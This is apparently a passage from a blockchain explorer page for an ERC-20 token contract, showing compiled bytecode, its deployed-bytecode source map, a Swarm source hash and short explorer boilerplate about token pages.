83811015610a835760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016104a1565b9392505050565b6000610a8383836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506109ea565b600060208083528351808285015260005b81811015610af957858101830151858201604001528201610add565b81811115610b0b576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610b3857600080fd5b919050565b60008060408385031215610b5057600080fd5b610b5983610b21565b946020939093013593505050565b600080600060608486031215610b7c57600080fd5b610b8584610b21565b9250610b9360208501610b21565b9150604084013590509250925092565b600060208284031215610bb557600080fd5b610a8382610b21565b600060208284031215610bd057600080fd5b5035919050565b60008060408385031215610bea57600080fd5b610bf383610b21565b9150610c0160208401610b21565b90509250929050565b600181811c90821680610c1e57607f821691505b60208210811415610c3f57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600082610c7857634e487b7160e01b600052601260045260246000fd5b500490565b6000816000190483118215151615610c9757610c97610c45565b500290565b600082821015610cae57610cae610c45565b500390565b60008219821115610cc657610cc6610c45565b50019056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220ef4cfd1646d784676e78e159a956b67a4a8b28ef72d243ffa9073df9498d6bc664736f6c634300080a0033

Deployed Bytecode Sourcemap

12453:4767:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13771:96;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14710:153;;;;;;:::i;:::-;;:::i;:::-;;;1218:14:1;;1211:22;1193:41;;1181:2;1166:18;14710:153:0;1053:187:1;12772:70:0;;;;;-1:-1:-1;;;;;12772:70:0;;;;;;-1:-1:-1;;;;;1409:32:1;;;1391:51;;1379:2;1364:18;12772:70:0;1245:203:1;13923:104:0;14009:12;;13923:104;;;1599:25:1;;;1587:2;1572:18;13923:104:0;1453:177:1;14869:301:0;;;;;;:::i;:::-;;:::i;13465:96::-;13546:9;;;;13465:96;;;2140:4:1;2128:17;;;2110:36;;2098:2;2083:18;13465:96:0;1968:184:1;12695:22:0;;;;;;;;;15176:200;;;;;;:::i;:::-;;:::i;13087:26::-;;;;;;13170:32;;;;;;14081:123;;;;;;:::i;:::-;-1:-1:-1;;;;;14180:18:0;14157:7;14180:18;;;:9;:18;;;;;;;14081:123;12294:148;;;:::i;:::-;;13310:96;13370:7;12056:6;-1:-1:-1;;;;;12056:6:0;13310:96;;13618:100;;;:::i;15384:251::-;;;;;;:::i;:::-;;:::i;14398:159::-;;;;;;:::i;:::-;;:::i;15646:161::-;;;;;;:::i;:::-;;:::i;12722:21::-;;;:::i;12748:19::-;;;:::i;15815:98::-;;;;;;:::i;:::-;;:::i;14565:139::-;;;;;;:::i;:::-;-1:-1:-1;;;;;14671:18:0;;;14648:7;14671:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;14565:139;13771:96;13827:13;13856:5;13849:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13771:96;:::o;14710:153::-;14787:4;14800:39;5834:10;14823:7;14832:6;14800:8;:39::i;:::-;-1:-1:-1;14853:4:0;14710:153;;;;:::o;14869:301::-;14969:4;14982:36;14992:6;15000:9;15011:6;14982:9;:36::i;:::-;15025:121;15034:6;5834:10;15056:89;15094:6;15056:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15056:19:0;;;;;;:11;:19;;;;;;;;5834:10;15056:33;;;;;;;;;;:37;:89::i;:::-;15025:8;:121::i;:::-;-1:-1:-1;15160:4:0;14869:301;;;;;:::o;15176:200::-;5834:10;15256:4;15301:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;15301:34:0;;;;;;;;;;15256:4;;15269:83;;15292:7;;15301:50;;15340:10;15301:38;:50::i;12294:148::-;12203:6;;-1:-1:-1;;;;;12203:6:0;5834:10;12203:22;12195:67;;;;-1:-1:-1;;;12195:67:0;;3385:2:1;12195:67:0;;;3367:21:1;;;3404:18;;;3397:30;3463:34;3443:18;;;3436:62;3515:18;;12195:67:0;;;;;;;;;12376:1:::1;12359:19:::0;;-1:-1:-1;;;;;;12359:19:0::1;::::0;;12394:40:::1;::::0;12376:1;;12394:40:::1;::::0;12376:1;;12394:40:::1;12294:148::o:0;13618:100::-;13676:13;13705:7;13698:14;;;;;:::i;15384:251::-;15469:4;15482:129;5834:10;15505:7;15514:96;15553:15;15514:96;;;;;;;;;;;;;;;;;5834:10;15514:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;15514:34:0;;;;;;;;;;;;:38;:96::i;14398:159::-;14478:4;14491:42;5834:10;14515:9;14526:6;14491:9;:42::i;15646:161::-;15737:15;;15727:6;:25;15717:53;;;;-1:-1:-1;;;15717:53:0;;3746:2:1;15717:53:0;;;3728:21:1;3785:2;3765:18;;;3758:30;-1:-1:-1;;;3804:18:1;;;3797:43;3857:18;;15717:53:0;3544:337:1;15717:53:0;15783:7;:16;15646:161::o;12722:21::-;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;12748:19::-;;;;;;;:::i;15815:98::-;12203:6;;-1:-1:-1;;;;;12203:6:0;5834:10;12203:22;12195:67;;;;-1:-1:-1;;;12195:67:0;;3385:2:1;12195:67:0;;;3367:21:1;;;3404:18;;;3397:30;3463:34;3443:18;;;3436:62;3515:18;;12195:67:0;3183:356:1;12195:67:0;15883:13:::1;:22:::0;15815:98::o;16897:320::-;-1:-1:-1;;;;;16987:19:0;;16979:68;;;;-1:-1:-1;;;16979:68:0;;4088:2:1;16979:68:0;;;4070:21:1;4127:2;4107:18;;;4100:30;4166:34;4146:18;;;4139:62;-1:-1:-1;;;4217:18:1;;;4210:34;4261:19;;16979:68:0;3886:400:1;16979:68:0;-1:-1:-1;;;;;17062:21:0;;17054:68;;;;-1:-1:-1;;;17054:68:0;;4493:2:1;17054:68:0;;;4475:21:1;4532:2;4512:18;;;4505:30;4571:34;4551:18;;;4544:62;-1:-1:-1;;;4622:18:1;;;4615:32;4664:19;;17054:68:0;4291:398:1;17054:68:0;-1:-1:-1;;;;;17131:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;17179:32;;1599:25:1;;;17179:32:0;;1572:18:1;17179:32:0;;;;;;;;16897:320;;;:::o;15921:661::-;-1:-1:-1;;;;;16027:20:0;;16019:70;;;;-1:-1:-1;;;16019:70:0;;4896:2:1;16019:70:0;;;4878:21:1;4935:2;4915:18;;;4908:30;4974:34;4954:18;;;4947:62;-1:-1:-1;;;5025:18:1;;;5018:35;5070:19;;16019:70:0;4694:401:1;16019:70:0;-1:-1:-1;;;;;16108:23:0;;16100:71;;;;-1:-1:-1;;;16100:71:0;;5302:2:1;16100:71:0;;;5284:21:1;5341:2;5321:18;;;5314:30;5380:34;5360:18;;;5353:62;-1:-1:-1;;;5431:18:1;;;5424:33;5474:19;;16100:71:0;5100:399:1;16100:71:0;16204;16226:6;16204:71;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16204:17:0;;;;;;:9;:17;;;;;;;:71;:21;:71::i;:::-;-1:-1:-1;;;;;16184:17:0;;;;;;;:9;:17;;;;;;:91;;;;16309:20;;;;;;;:32;;16334:6;16309:24;:32::i;:::-;-1:-1:-1;;;;;16286:20:0;;;;;;:9;:20;;;;;:55;16415:13;;16375:54;;16400:12;16409:3;16400:6;:12;:::i;:::-;:28;;;;:::i;:::-;-1:-1:-1;;;;;16375:20:0;;;;;;:9;:20;;;;;;;:24;:54::i;:::-;-1:-1:-1;;;;;16352:20:0;;;;;;:9;:20;;;;;:77;16505:7;;16464:49;;16490:12;16499:3;16490:6;:12;:::i;:::-;:22;;;;:::i;:::-;16474:10;;-1:-1:-1;;;;;16474:10:0;16464:21;;;;:9;:21;;;;;;;:25;:49::i;:::-;16450:10;;-1:-1:-1;;;;;16450:10:0;;;16440:21;;;;:9;:21;;;;;;;;;:73;;;;16529:35;1599:25:1;;;16529:35:0;;;;;;;;;;1572:18:1;16529:35:0;1453:177:1;7620:178:0;7706:7;7738:12;7730:6;;;;7722:29;;;;-1:-1:-1;;;7722:29:0;;;;;;;;:::i;:::-;-1:-1:-1;7758:9:0;7770:5;7774:1;7770;:5;:::i;:::-;7758:17;7620:178;-1:-1:-1;;;;;7620:178:0:o;6793:167::-;6851:7;;6879:5;6883:1;6879;:5;:::i;:::-;6867:17;;6904:1;6899;:6;;6891:46;;;;-1:-1:-1;;;6891:46:0;;6496:2:1;6891:46:0;;;6478:21:1;6535:2;6515:18;;;6508:30;6574:29;6554:18;;;6547:57;6621:18;;6891:46:0;6294:351:1;6891:46:0;6953:1;6793:167;-1:-1:-1;;;6793:167:0:o;7215:130::-;7273:7;7296:43;7300:1;7303;7296:43;;;;;;;;;;;;;;;;;:3;:43::i;14:597:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:173::-;684:20;;-1:-1:-1;;;;;733:31:1;;723:42;;713:70;;779:1;776;769:12;713:70;616:173;;;:::o;794:254::-;862:6;870;923:2;911:9;902:7;898:23;894:32;891:52;;;939:1;936;929:12;891:52;962:29;981:9;962:29;:::i;:::-;952:39;1038:2;1023:18;;;;1010:32;;-1:-1:-1;;;794:254:1:o;1635:328::-;1712:6;1720;1728;1781:2;1769:9;1760:7;1756:23;1752:32;1749:52;;;1797:1;1794;1787:12;1749:52;1820:29;1839:9;1820:29;:::i;:::-;1810:39;;1868:38;1902:2;1891:9;1887:18;1868:38;:::i;:::-;1858:48;;1953:2;1942:9;1938:18;1925:32;1915:42;;1635:328;;;;;:::o;2157:186::-;2216:6;2269:2;2257:9;2248:7;2244:23;2240:32;2237:52;;;2285:1;2282;2275:12;2237:52;2308:29;2327:9;2308:29;:::i;2348:180::-;2407:6;2460:2;2448:9;2439:7;2435:23;2431:32;2428:52;;;2476:1;2473;2466:12;2428:52;-1:-1:-1;2499:23:1;;2348:180;-1:-1:-1;2348:180:1:o;2533:260::-;2601:6;2609;2662:2;2650:9;2641:7;2637:23;2633:32;2630:52;;;2678:1;2675;2668:12;2630:52;2701:29;2720:9;2701:29;:::i;:::-;2691:39;;2749:38;2783:2;2772:9;2768:18;2749:38;:::i;:::-;2739:48;;2533:260;;;;;:::o;2798:380::-;2877:1;2873:12;;;;2920;;;2941:61;;2995:4;2987:6;2983:17;2973:27;;2941:61;3048:2;3040:6;3037:14;3017:18;3014:38;3011:161;;;3094:10;3089:3;3085:20;3082:1;3075:31;3129:4;3126:1;3119:15;3157:4;3154:1;3147:15;3011:161;;2798:380;;;:::o;5504:127::-;5565:10;5560:3;5556:20;5553:1;5546:31;5596:4;5593:1;5586:15;5620:4;5617:1;5610:15;5636:217;5676:1;5702;5692:132;;5746:10;5741:3;5737:20;5734:1;5727:31;5781:4;5778:1;5771:15;5809:4;5806:1;5799:15;5692:132;-1:-1:-1;5838:9:1;;5636:217::o;5858:168::-;5898:7;5964:1;5960;5956:6;5952:14;5949:1;5946:21;5941:1;5934:9;5927:17;5923:45;5920:71;;;5971:18;;:::i;:::-;-1:-1:-1;6011:9:1;;5858:168::o;6031:125::-;6071:4;6099:1;6096;6093:8;6090:34;;;6104:18;;:::i;:::-;-1:-1:-1;6141:9:1;;6031:125::o;6161:128::-;6201:3;6232:1;6228:6;6225:1;6222:13;6219:39;;;6238:18;;:::i;:::-;-1:-1:-1;6274:9:1;;6161:128::o

Swarm Source

ipfs://ef4cfd1646d784676e78e159a956b67a4a8b28ef72d243ffa9073df9498d6bc6
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.